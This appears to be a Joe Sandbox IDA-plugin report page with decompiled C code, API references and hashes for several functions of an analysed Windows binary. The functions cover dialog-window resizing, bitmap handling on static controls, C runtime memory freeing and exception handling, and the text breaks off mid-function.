Function 00B6E2E8 Relevance: 26.5, APIs: 12, Strings: 3, Instructions: 234
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E00B6E2E8(struct HWND__* __ecx, void* __edx, void* __eflags, intOrPtr _a8) {
				char _v0;
				struct HWND__* _v8;
				short _v2048;
				char _v2208;
				char _v2288;
				signed int _v2292;
				char _v2300;
				intOrPtr _v2304;
				struct tagRECT _v2320;
				intOrPtr _v2324;
				intOrPtr _v2336;
				struct tagRECT _v2352;
				struct tagRECT _v2368;
				signed int _v2376;
				char _v2377;
				intOrPtr _v2384;
				intOrPtr _v2393;
				void* __ebx;
				void* __esi;
				signed int _t95;
				struct HWND__* _t106;
				signed int _t119;
				signed int _t134;
				signed int _t145;
				void* _t150;
				void* _t155;
				char _t156;
				void* _t157;
				signed int _t158;
				intOrPtr _t160;
				void* _t163;
				void* _t169;
				long _t170;
				signed int _t174;
				void* _t178;
				signed int _t179;
				signed int _t186;
				struct HWND__* _t187;
				struct HWND__* _t188;
				void* _t189;
				void* _t192;
				signed int _t193;
				long _t194;
				void* _t201;
				int* _t202;
				struct HWND__* _t203;
				void* _t205;
				void* _t206;
				void* _t208;
				void* _t210;
				void* _t214;
				signed int _t221;

				_t178 = __edx;
				_t203 = __ecx;
				_v2368.bottom = __ecx;
				E00B64092( &_v2208, 0x50, L"$%s:", _a8);
				_t208 =  &_v2368 + 0x10;
				E00B71DA7( &_v2208,  &_v2288, 0x50);
				_t95 = E00B83E90( &_v2300);
				_t187 = _v8;
				_t155 = 0;
				_v2376 = _t95;
				_t210 =  *0xb9e720 - _t155; // 0x64
				if(_t210 <= 0) {
					L8:
					_t156 = E00B6D81C(_t155, _t203, _t178, _t189, _t214, _a8,  &(_v2368.right),  &(_v2368.top));
					_v2377 = _t156;
					GetWindowRect(_t187,  &_v2352);
					GetClientRect(_t187,  &(_v2320.top));
					_t169 = _v2352.right - _v2352.left + 1;
					_t179 = _v2320.bottom;
					_t192 = _v2352.bottom - _v2352.top + 1;
					_v2368.right = 0x64;
					_t205 = _t192 - _v2304;
					_v2368.bottom = _t169 - _t179;
					if(_v0 == 0) {
						if(_t156 != 0) {
							_t158 = 0x64;
							asm("cdq");
							_t134 = _v2292 * _v2368.top;
							_t160 = _t179 * _v2368.right / _t158 + _v2352.right;
							_v2324 = _t160;
							asm("cdq");
							_t186 = _t134 % _v2352.top;
							_v2352.left = _t134 / _v2352.top + _t205;
							asm("cdq");
							asm("cdq");
							_t201 = (_t192 - _v2352.left - _t186 >> 1) + _v2336;
							_t163 = (_t169 - _t160 - _t186 >> 1) + _v2352.bottom;
							if(_t163 < 0) {
								_t163 = 0;
							}
							if(_t201 < 0) {
								_t201 = 0;
							}
							_t145 =  !(GetWindowLongW(_t187, 0xfffffff0) >> 0xa) & 0x00000002 | 0x00000204;
							_t221 = _t145;
							 *0xbc3150(_t187, 0, _t163, _t201, _v2324, _v2352.left, _t145);
							GetWindowRect(_t187,  &_v2368);
							_t156 = _v2393;
						}
						if(E00B6D89C(_t156, _v2368.bottom, _t221, _a8, L"CAPTION",  &_v2048, 0x400) != 0) {
							SetWindowTextW(_t187,  &_v2048);
						}
					}
					_t206 = _t205 - GetSystemMetrics(8);
					_t106 = GetWindow(_t187, 5);
					_t188 = _t106;
					_v2368.bottom = _t188;
					if(_t156 == 0) {
						L23:
						return _t106;
					} else {
						_t157 = 0;
						while(_t188 != 0) {
							__eflags = _t157 - 0x200;
							if(_t157 >= 0x200) {
								goto L23;
							}
							GetWindowRect(_t188,  &_v2320);
							_t170 = _v2320.top.left;
							_t193 = 0x64;
							asm("cdq");
							_t194 = _v2320.left;
							asm("cdq");
							_t119 = (_t170 - _t206 - _v2336) * _v2368.top;
							asm("cdq");
							_t174 = 0x64;
							asm("cdq");
							asm("cdq");
							 *0xbc3150(_t188, 0, (_t194 - (_v2352.right - _t119 % _t174 >> 1) - _v2352.bottom) * _v2368.right / _t174, _t119 / _t174, (_v2320.right - _t194 + 1) * _v2368.right / _v2352.top, (_v2320.bottom - _t170 + 1) * _v2368.top / _t193, 0x204);
							_t106 = GetWindow(_t188, 2);
							_t188 = _t106;
							__eflags = _t188 - _v2384;
							if(_t188 == _v2384) {
								goto L23;
							}
							_t157 = _t157 + 1;
							__eflags = _t157;
						}
						goto L23;
					}
				} else {
					_t202 = 0xb9e274;
					do {
						if( *_t202 > 0) {
							_t9 =  &(_t202[1]); // 0xb94788
							_t150 = E00B86740( &_v2288,  *_t9, _t95);
							_t208 = _t208 + 0xc;
							if(_t150 == 0) {
								_t12 =  &(_t202[1]); // 0xb94788
								if(E00B6D9F0(_t155, _t203, _t202,  *_t12,  &_v2048, 0x400) != 0) {
									SetDlgItemTextW(_t187,  *_t202,  &_v2048);
								}
							}
							_t95 = _v2368.top;
						}
						_t155 = _t155 + 1;
						_t202 =  &(_t202[3]);
						_t214 = _t155 -  *0xb9e720; // 0x64
					} while (_t214 < 0);
					goto L8;
				}
			}

0x00b6e2e8
0x00b6e300
0x00b6e30a
0x00b6e30e
0x00b6e313
0x00b6e325
0x00b6e32f
0x00b6e334
0x00b6e33b
0x00b6e33e
0x00b6e342
0x00b6e348
0x00b6e3a5
0x00b6e3bd
0x00b6e3c5
0x00b6e3c9
0x00b6e3d5
0x00b6e3e7
0x00b6e3ee
0x00b6e3f2
0x00b6e3f5
0x00b6e3fd
0x00b6e40b
0x00b6e40f
0x00b6e417
0x00b6e424
0x00b6e427
0x00b6e430
0x00b6e435
0x00b6e43b
0x00b6e43f
0x00b6e440
0x00b6e446
0x00b6e450
0x00b6e457
0x00b6e460
0x00b6e464
0x00b6e468
0x00b6e46a
0x00b6e46a
0x00b6e46e
0x00b6e470
0x00b6e470
0x00b6e483
0x00b6e483
0x00b6e496
0x00b6e4a2
0x00b6e4a8
0x00b6e4a8
0x00b6e4d0
0x00b6e4db
0x00b6e4db
0x00b6e4d0
0x00b6e4ec
0x00b6e4ee
0x00b6e4f4
0x00b6e4f6
0x00b6e4fc
0x00b6e5ae
0x00b6e5ae
0x00b6e502
0x00b6e502
0x00b6e59c
0x00b6e509
0x00b6e50f
0x00000000
0x00000000
0x00b6e51b
0x00b6e525
0x00b6e53a
0x00b6e53f
0x00b6e542
0x00b6e558
0x00b6e560
0x00b6e562
0x00b6e563
0x00b6e56b
0x00b6e57d
0x00b6e584
0x00b6e58d
0x00b6e593
0x00b6e595
0x00b6e599
0x00000000
0x00000000
0x00b6e59b
0x00b6e59b
0x00b6e59b
0x00000000
0x00b6e59c
0x00b6e34a
0x00b6e34a
0x00b6e34f
0x00b6e352
0x00b6e355
0x00b6e35d
0x00b6e362
0x00b6e367
0x00b6e378
0x00b6e382
0x00b6e38f
0x00b6e38f
0x00b6e382
0x00b6e395
0x00b6e395
0x00b6e399
0x00b6e39a
0x00b6e39d
0x00b6e39d
0x00000000
0x00b6e34f

APIs

_swprintf.LIBCMT ref: 00B6E30E

Part of subcall function 00B64092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00B640A5

Part of subcall function 00B71DA7: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,?,00000000,00000000,?,00BA1030,?,00B6D928,00000000,?,00000050,00BA1030), ref: 00B71DC4

_strlen.LIBCMT ref: 00B6E32F
SetDlgItemTextW.USER32(?,00B9E274,?), ref: 00B6E38F
GetWindowRect.USER32(?,?), ref: 00B6E3C9
GetClientRect.USER32(?,?), ref: 00B6E3D5
GetWindowLongW.USER32(?,000000F0), ref: 00B6E475
GetWindowRect.USER32(?,?), ref: 00B6E4A2
SetWindowTextW.USER32(?,?), ref: 00B6E4DB
GetSystemMetrics.USER32(00000008), ref: 00B6E4E3
GetWindow.USER32(?,00000005), ref: 00B6E4EE
GetWindowRect.USER32(00000000,?), ref: 00B6E51B
GetWindow.USER32(00000000,00000002), ref: 00B6E58D

Strings

$%s:, xrefs: 00B6E302
CAPTION, xrefs: 00B6E4BD
d, xrefs: 00B6E3F5

Memory Dump Source

Source File: 00000000.00000002.268617007.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000000.00000002.268588954.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.269911240.0000000000B93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270395727.0000000000BC3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b60000_1JCAVkYU3U.jbxd

Similarity

API ID: Window$Rect$Text$ByteCharClientItemLongMetricsMultiSystemWide__vswprintf_c_l_strlen_swprintf
String ID: $%s:$CAPTION$d
API String ID: 2407758923-2512411981
Opcode ID: a1a9e6805a709c6334b31d508ae749fab15a1cee78644b927352b344fa2e78ec
Instruction ID: 728759daf4178125bd5d7e806b88eb392aeadbdaf3969e3119783285c54427df
Opcode Fuzzy Hash: a1a9e6805a709c6334b31d508ae749fab15a1cee78644b927352b344fa2e78ec
Instruction Fuzzy Hash: 88819371608301AFD710DF68CD89E6FBBE9EB88704F04491DFA95E7250D735E9058B52

Uniqueness

Uniqueness Score: -1.00%

Function 00B8CB22 Relevance: 19.6, APIs: 13, Instructions: 114
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E00B8CB22(intOrPtr _a4) {
				intOrPtr _v8;
				intOrPtr _t25;
				intOrPtr* _t26;
				intOrPtr _t28;
				intOrPtr* _t29;
				intOrPtr* _t31;
				intOrPtr* _t45;
				intOrPtr* _t46;
				intOrPtr* _t47;
				intOrPtr* _t55;
				intOrPtr* _t70;
				intOrPtr _t74;

				_t74 = _a4;
				_t25 =  *((intOrPtr*)(_t74 + 0x88));
				if(_t25 != 0 && _t25 != 0xb9eea0) {
					_t45 =  *((intOrPtr*)(_t74 + 0x7c));
					if(_t45 != 0 &&  *_t45 == 0) {
						_t46 =  *((intOrPtr*)(_t74 + 0x84));
						if(_t46 != 0 &&  *_t46 == 0) {
							E00B88DCC(_t46);
							E00B8C701( *((intOrPtr*)(_t74 + 0x88)));
						}
						_t47 =  *((intOrPtr*)(_t74 + 0x80));
						if(_t47 != 0 &&  *_t47 == 0) {
							E00B88DCC(_t47);
							E00B8C7FF( *((intOrPtr*)(_t74 + 0x88)));
						}
						E00B88DCC( *((intOrPtr*)(_t74 + 0x7c)));
						E00B88DCC( *((intOrPtr*)(_t74 + 0x88)));
					}
				}
				_t26 =  *((intOrPtr*)(_t74 + 0x8c));
				if(_t26 != 0 &&  *_t26 == 0) {
					E00B88DCC( *((intOrPtr*)(_t74 + 0x90)) - 0xfe);
					E00B88DCC( *((intOrPtr*)(_t74 + 0x94)) - 0x80);
					E00B88DCC( *((intOrPtr*)(_t74 + 0x98)) - 0x80);
					E00B88DCC( *((intOrPtr*)(_t74 + 0x8c)));
				}
				E00B8CC95( *((intOrPtr*)(_t74 + 0x9c)));
				_t28 = 6;
				_t55 = _t74 + 0xa0;
				_v8 = _t28;
				_t70 = _t74 + 0x28;
				do {
					if( *((intOrPtr*)(_t70 - 8)) != 0xb9e968) {
						_t31 =  *_t70;
						if(_t31 != 0 &&  *_t31 == 0) {
							E00B88DCC(_t31);
							E00B88DCC( *_t55);
						}
						_t28 = _v8;
					}
					if( *((intOrPtr*)(_t70 - 0xc)) != 0) {
						_t29 =  *((intOrPtr*)(_t70 - 4));
						if(_t29 != 0 &&  *_t29 == 0) {
							E00B88DCC(_t29);
						}
						_t28 = _v8;
					}
					_t55 = _t55 + 4;
					_t70 = _t70 + 0x10;
					_t28 = _t28 - 1;
					_v8 = _t28;
				} while (_t28 != 0);
				return E00B88DCC(_t74);
			}

0x00b8cb2a
0x00b8cb2e
0x00b8cb36
0x00b8cb3f
0x00b8cb44
0x00b8cb4b
0x00b8cb53
0x00b8cb5b
0x00b8cb66
0x00b8cb6c
0x00b8cb6d
0x00b8cb75
0x00b8cb7d
0x00b8cb88
0x00b8cb8e
0x00b8cb92
0x00b8cb9d
0x00b8cba3
0x00b8cb44
0x00b8cba4
0x00b8cbac
0x00b8cbbf
0x00b8cbd2
0x00b8cbe0
0x00b8cbeb
0x00b8cbf0
0x00b8cbf9
0x00b8cc01
0x00b8cc02
0x00b8cc08
0x00b8cc0b
0x00b8cc0e
0x00b8cc15
0x00b8cc17
0x00b8cc1b
0x00b8cc23
0x00b8cc2a
0x00b8cc30
0x00b8cc31
0x00b8cc31
0x00b8cc38
0x00b8cc3a
0x00b8cc3f
0x00b8cc47
0x00b8cc4c
0x00b8cc4d
0x00b8cc4d
0x00b8cc50
0x00b8cc53
0x00b8cc56
0x00b8cc59
0x00b8cc59
0x00b8cc6b

APIs

___free_lconv_mon.LIBCMT ref: 00B8CB66

Part of subcall function 00B8C701: _free.LIBCMT ref: 00B8C71E
Part of subcall function 00B8C701: _free.LIBCMT ref: 00B8C730
Part of subcall function 00B8C701: _free.LIBCMT ref: 00B8C742
Part of subcall function 00B8C701: _free.LIBCMT ref: 00B8C754
Part of subcall function 00B8C701: _free.LIBCMT ref: 00B8C766
Part of subcall function 00B8C701: _free.LIBCMT ref: 00B8C778
Part of subcall function 00B8C701: _free.LIBCMT ref: 00B8C78A
Part of subcall function 00B8C701: _free.LIBCMT ref: 00B8C79C
Part of subcall function 00B8C701: _free.LIBCMT ref: 00B8C7AE
Part of subcall function 00B8C701: _free.LIBCMT ref: 00B8C7C0
Part of subcall function 00B8C701: _free.LIBCMT ref: 00B8C7D2
Part of subcall function 00B8C701: _free.LIBCMT ref: 00B8C7E4
Part of subcall function 00B8C701: _free.LIBCMT ref: 00B8C7F6

_free.LIBCMT ref: 00B8CB5B

Part of subcall function 00B88DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,00B8C896,?,00000000,?,00000000,?,00B8C8BD,?,00000007,?,?,00B8CCBA,?), ref: 00B88DE2
Part of subcall function 00B88DCC: GetLastError.KERNEL32(?,?,00B8C896,?,00000000,?,00000000,?,00B8C8BD,?,00000007,?,?,00B8CCBA,?,?), ref: 00B88DF4

_free.LIBCMT ref: 00B8CB7D
_free.LIBCMT ref: 00B8CB92
_free.LIBCMT ref: 00B8CB9D
_free.LIBCMT ref: 00B8CBBF
_free.LIBCMT ref: 00B8CBD2
_free.LIBCMT ref: 00B8CBE0
_free.LIBCMT ref: 00B8CBEB
_free.LIBCMT ref: 00B8CC23
_free.LIBCMT ref: 00B8CC2A
_free.LIBCMT ref: 00B8CC47
_free.LIBCMT ref: 00B8CC5F

Memory Dump Source

Source File: 00000000.00000002.268617007.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000000.00000002.268588954.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.269911240.0000000000B93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270395727.0000000000BC3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b60000_1JCAVkYU3U.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast___free_lconv_mon
String ID:
API String ID: 161543041-0
Opcode ID: 2c5c5ab36a1ab780cc5bb83fe9e29071d3a0c4f10d889ce5046b8ced3dbe7e47
Instruction ID: 9d3ceade14a9168595fec2816f1e7e6d2bdde5d1fff73f3d30e61394a9bb0ce3
Opcode Fuzzy Hash: 2c5c5ab36a1ab780cc5bb83fe9e29071d3a0c4f10d889ce5046b8ced3dbe7e47
Instruction Fuzzy Hash: 8B314DB16047099FEB21BA38D846B5A7BEAEF10310F5454ADE558D72B2DF31EC41CB60

Uniqueness

Uniqueness Score: -1.00%

Function 00B7D69E Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 79
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00B7D69E(void* __ecx, void* __edx, void* __eflags, void* __fp0, short _a24, struct HWND__* _a4124) {
				void _v0;
				intOrPtr _v4;
				intOrPtr _v12;
				struct HWND__* _t9;
				void* _t19;
				void* _t26;
				void* _t28;
				void* _t30;
				struct HWND__* _t33;
				struct HWND__* _t36;
				void* _t40;
				void* _t49;

				_t49 = __fp0;
				_t40 = __eflags;
				_t28 = __edx;
				E00B7EC50(0x1018);
				_t9 = E00B7A5C6(_t40);
				if(_t9 == 0) {
					L12:
					return _t9;
				}
				_t9 = GetWindow(_a4124, 5);
				_t33 = _t9;
				_t30 = 0;
				_t36 = _t33;
				if(_t33 == 0) {
					L11:
					goto L12;
				}
				while(_t30 < 0x200) {
					GetClassNameW(_t33,  &_a24, 0x800);
					if(E00B71FBB( &_a24, L"STATIC") == 0 && (GetWindowLongW(_t33, 0xfffffff0) & 0x0000001f) == 0xe) {
						_t26 = SendMessageW(_t33, 0x173, 0, 0);
						if(_t26 != 0) {
							GetObjectW(_t26, 0x18,  &_v0);
							_t19 = E00B7A605(_v4);
							SendMessageW(_t33, 0x172, 0, E00B7A80C(_t28, _t49, _t26, E00B7A5E4(_v12), _t19));
							DeleteObject(_t26);
						}
					}
					_t9 = GetWindow(_t33, 2);
					_t33 = _t9;
					if(_t33 != _t36) {
						_t30 = _t30 + 1;
						if(_t33 != 0) {
							continue;
						}
					}
					break;
				}
				goto L11;
			}

0x00b7d69e
0x00b7d69e
0x00b7d69e
0x00b7d6a3
0x00b7d6a8
0x00b7d6af
0x00b7d786
0x00b7d78c
0x00b7d78c
0x00b7d6c1
0x00b7d6c7
0x00b7d6c9
0x00b7d6cb
0x00b7d6cf
0x00b7d783
0x00000000
0x00b7d785
0x00b7d6d6
0x00b7d6ed
0x00b7d704
0x00b7d726
0x00b7d72a
0x00b7d734
0x00b7d73e
0x00b7d75d
0x00b7d764
0x00b7d764
0x00b7d72a
0x00b7d76d
0x00b7d773
0x00b7d777
0x00b7d779
0x00b7d77c
0x00000000
0x00000000
0x00b7d77c
0x00000000
0x00b7d777
0x00000000

APIs

GetWindow.USER32(?,00000005), ref: 00B7D6C1
GetClassNameW.USER32(00000000,?,00000800), ref: 00B7D6ED

Part of subcall function 00B71FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,00B6C116,00000000,.exe,?,?,00000800,?,?,?,00B78E3C), ref: 00B71FD1

GetWindowLongW.USER32(00000000,000000F0), ref: 00B7D709
SendMessageW.USER32(00000000,00000173,00000000,00000000), ref: 00B7D720
GetObjectW.GDI32(00000000,00000018,?), ref: 00B7D734
SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 00B7D75D
DeleteObject.GDI32(00000000), ref: 00B7D764
GetWindow.USER32(00000000,00000002), ref: 00B7D76D

Strings

STATIC, xrefs: 00B7D6F3

Memory Dump Source

Source File: 00000000.00000002.268617007.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000000.00000002.268588954.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.269911240.0000000000B93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270395727.0000000000BC3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b60000_1JCAVkYU3U.jbxd

Similarity

API ID: Window$MessageObjectSend$ClassCompareDeleteLongNameString
String ID: STATIC
API String ID: 3820355801-1882779555
Opcode ID: ebed9070a22652374ed0d346158553bacb226ab025e56a103213e320f1eba027
Instruction ID: b4c293eacbabec054ded0bd89c210ecd2c11f48a9974465ebde242de8f4f7a99
Opcode Fuzzy Hash: ebed9070a22652374ed0d346158553bacb226ab025e56a103213e320f1eba027
Instruction Fuzzy Hash: 071121322003107FE6216B709C4AFAF76ECEF58B81F40C160FA6AB6091DA64CE0542A6

Uniqueness

Uniqueness Score: -1.00%

Function 00B896F1 Relevance: 15.1, APIs: 10, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00B896F1(char _a4) {
				char _v8;

				_t26 = _a4;
				_t52 =  *_a4;
				if( *_a4 != 0xb96430) {
					E00B88DCC(_t52);
					_t26 = _a4;
				}
				E00B88DCC( *((intOrPtr*)(_t26 + 0x3c)));
				E00B88DCC( *((intOrPtr*)(_a4 + 0x30)));
				E00B88DCC( *((intOrPtr*)(_a4 + 0x34)));
				E00B88DCC( *((intOrPtr*)(_a4 + 0x38)));
				E00B88DCC( *((intOrPtr*)(_a4 + 0x28)));
				E00B88DCC( *((intOrPtr*)(_a4 + 0x2c)));
				E00B88DCC( *((intOrPtr*)(_a4 + 0x40)));
				E00B88DCC( *((intOrPtr*)(_a4 + 0x44)));
				E00B88DCC( *((intOrPtr*)(_a4 + 0x360)));
				_v8 =  &_a4;
				E00B895A9(5,  &_v8);
				_v8 =  &_a4;
				return E00B895F9(4,  &_v8);
			}

0x00b896f7
0x00b896fa
0x00b89702
0x00b89705
0x00b8970a
0x00b8970d
0x00b89711
0x00b8971c
0x00b89727
0x00b89732
0x00b8973d
0x00b89748
0x00b89753
0x00b8975e
0x00b8976c
0x00b89774
0x00b8977d
0x00b89785
0x00b89799

APIs

_free.LIBCMT ref: 00B89705

Part of subcall function 00B88DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,00B8C896,?,00000000,?,00000000,?,00B8C8BD,?,00000007,?,?,00B8CCBA,?), ref: 00B88DE2
Part of subcall function 00B88DCC: GetLastError.KERNEL32(?,?,00B8C896,?,00000000,?,00000000,?,00B8C8BD,?,00000007,?,?,00B8CCBA,?,?), ref: 00B88DF4

_free.LIBCMT ref: 00B89711
_free.LIBCMT ref: 00B8971C
_free.LIBCMT ref: 00B89727
_free.LIBCMT ref: 00B89732
_free.LIBCMT ref: 00B8973D
_free.LIBCMT ref: 00B89748
_free.LIBCMT ref: 00B89753
_free.LIBCMT ref: 00B8975E
_free.LIBCMT ref: 00B8976C

Memory Dump Source

Source File: 00000000.00000002.268617007.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000000.00000002.268588954.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.269911240.0000000000B93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270395727.0000000000BC3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b60000_1JCAVkYU3U.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 19700182756d95a1ac5e9ecfec55b0ce8c84c688c647915fdf5002d518f710cb
Instruction ID: 85d71c2056f5d882bcebdc735357c3d67c1ce658cc965af11105eb18dee5857b
Opcode Fuzzy Hash: 19700182756d95a1ac5e9ecfec55b0ce8c84c688c647915fdf5002d518f710cb
Instruction Fuzzy Hash: 8D119076110109AFCB01FF94C982CD93BB6EF14350B9154A9FA088F272DE32EA51DB84

Uniqueness

Uniqueness Score: -1.00%

Function 00B82E31 Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 303
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 64%

			E00B82E31(signed int __edx, signed char* _a4, signed int _a8, signed int _a12, char _a16, signed int* _a20, signed int _a24, signed int _a28, signed int _a32) {
				signed char* _v0;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				intOrPtr _v24;
				char _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				intOrPtr _v48;
				signed int _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				void _v64;
				signed int _v68;
				char _v84;
				intOrPtr _v88;
				signed int _v92;
				intOrPtr _v100;
				void _v104;
				intOrPtr* _v112;
				signed char* _v184;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t201;
				signed int _t202;
				char _t203;
				signed int _t205;
				signed int _t207;
				signed char* _t208;
				signed int _t209;
				signed int _t210;
				signed int _t214;
				void* _t217;
				signed char* _t220;
				void* _t222;
				void* _t224;
				signed char _t228;
				signed int _t229;
				void* _t231;
				void* _t234;
				void* _t237;
				signed int _t247;
				void* _t250;
				intOrPtr* _t251;
				signed int _t252;
				intOrPtr _t253;
				signed int _t254;
				void* _t259;
				void* _t261;
				void* _t264;
				void* _t265;
				signed int _t269;
				signed char* _t270;
				intOrPtr* _t271;
				signed char _t272;
				signed int _t273;
				signed int _t274;
				intOrPtr* _t276;
				signed int _t277;
				signed int _t278;
				signed int _t283;
				signed int _t290;
				signed int _t291;
				signed int _t294;
				signed int _t296;
				signed char* _t297;
				signed int _t298;
				signed char _t299;
				signed int* _t301;
				signed char* _t304;
				signed int _t314;
				signed int _t315;
				signed int _t317;
				signed int _t327;
				void* _t329;
				void* _t331;
				void* _t332;
				void* _t333;
				void* _t334;

				_t296 = __edx;
				_push(_t315);
				_t301 = _a20;
				_v20 = 0;
				_v28 = 0;
				_t275 = E00B83DAA(_a8, _a16, _t301);
				_t332 = _t331 + 0xc;
				_v12 = _t275;
				if(_t275 < 0xffffffff || _t275 >= _t301[1]) {
					L67:
					_t201 = E00B88D24(_t270, _t296, _t301, _t315);
					asm("int3");
					_t329 = _t332;
					_t333 = _t332 - 0x38;
					_push(_t270);
					_t271 = _v112;
					__eflags =  *_t271 - 0x80000003;
					if(__eflags == 0) {
						return _t201;
					} else {
						_push(_t315);
						_push(_t301);
						_t202 = E00B82AEC(_t271, _t275, _t296, _t301, _t315, __eflags);
						__eflags =  *(_t202 + 8);
						if(__eflags != 0) {
							__imp__EncodePointer(0);
							_t315 = _t202;
							_t222 = E00B82AEC(_t271, _t275, _t296, 0, _t315, __eflags);
							__eflags =  *((intOrPtr*)(_t222 + 8)) - _t315;
							if( *((intOrPtr*)(_t222 + 8)) != _t315) {
								__eflags =  *_t271 - 0xe0434f4d;
								if( *_t271 != 0xe0434f4d) {
									__eflags =  *_t271 - 0xe0434352;
									if( *_t271 != 0xe0434352) {
										_t214 = E00B80961(_t296, 0, _t315, _t271, _a4, _a8, _a12, _a16, _a24, _a28);
										_t333 = _t333 + 0x1c;
										__eflags = _t214;
										if(_t214 != 0) {
											L84:
											return _t214;
										}
									}
								}
							}
						}
						_t203 = _a16;
						_v28 = _t203;
						_v24 = 0;
						__eflags =  *(_t203 + 0xc);
						if( *(_t203 + 0xc) > 0) {
							_push(_a24);
							E00B80894(_t271, _t275, 0, _t315,  &_v44,  &_v28, _a20, _a12, _t203);
							_t298 = _v40;
							_t334 = _t333 + 0x18;
							_t214 = _v44;
							_v20 = _t214;
							_v12 = _t298;
							__eflags = _t298 - _v32;
							if(_t298 >= _v32) {
								goto L84;
							}
							_t277 = _t298 * 0x14;
							__eflags = _t277;
							_v16 = _t277;
							do {
								_t278 = 5;
								_t217 = memcpy( &_v64,  *((intOrPtr*)( *_t214 + 0x10)) + _t277, _t278 << 2);
								_t334 = _t334 + 0xc;
								__eflags = _v64 - _t217;
								if(_v64 > _t217) {
									goto L83;
								}
								__eflags = _t217 - _v60;
								if(_t217 > _v60) {
									goto L83;
								}
								_t220 = _v48 + 0xfffffff0 + (_v52 << 4);
								_t283 = _t220[4];
								__eflags = _t283;
								if(_t283 == 0) {
									L81:
									__eflags =  *_t220 & 0x00000040;
									if(( *_t220 & 0x00000040) == 0) {
										_push(0);
										_push(1);
										E00B82DB1(_t298, _t271, _a4, _a8, _a12, _a16, _t220, 0,  &_v64, _a24, _a28);
										_t298 = _v12;
										_t334 = _t334 + 0x30;
									}
									goto L83;
								}
								__eflags =  *((char*)(_t283 + 8));
								if( *((char*)(_t283 + 8)) != 0) {
									goto L83;
								}
								goto L81;
								L83:
								_t298 = _t298 + 1;
								_t214 = _v20;
								_t277 = _v16 + 0x14;
								_v12 = _t298;
								_v16 = _t277;
								__eflags = _t298 - _v32;
							} while (_t298 < _v32);
							goto L84;
						}
						E00B88D24(_t271, _t296, 0, _t315);
						asm("int3");
						_push(_t329);
						_t297 = _v184;
						_push(_t271);
						_push(_t315);
						_push(0);
						_t205 = _t297[4];
						__eflags = _t205;
						if(_t205 == 0) {
							L109:
							_t207 = 1;
							__eflags = 1;
						} else {
							_t276 = _t205 + 8;
							__eflags =  *_t276;
							if( *_t276 == 0) {
								goto L109;
							} else {
								__eflags =  *_t297 & 0x00000080;
								_t304 = _v0;
								if(( *_t297 & 0x00000080) == 0) {
									L91:
									_t272 = _t304[4];
									_t317 = 0;
									__eflags = _t205 - _t272;
									if(_t205 == _t272) {
										L101:
										__eflags =  *_t304 & 0x00000002;
										if(( *_t304 & 0x00000002) == 0) {
											L103:
											_t208 = _a4;
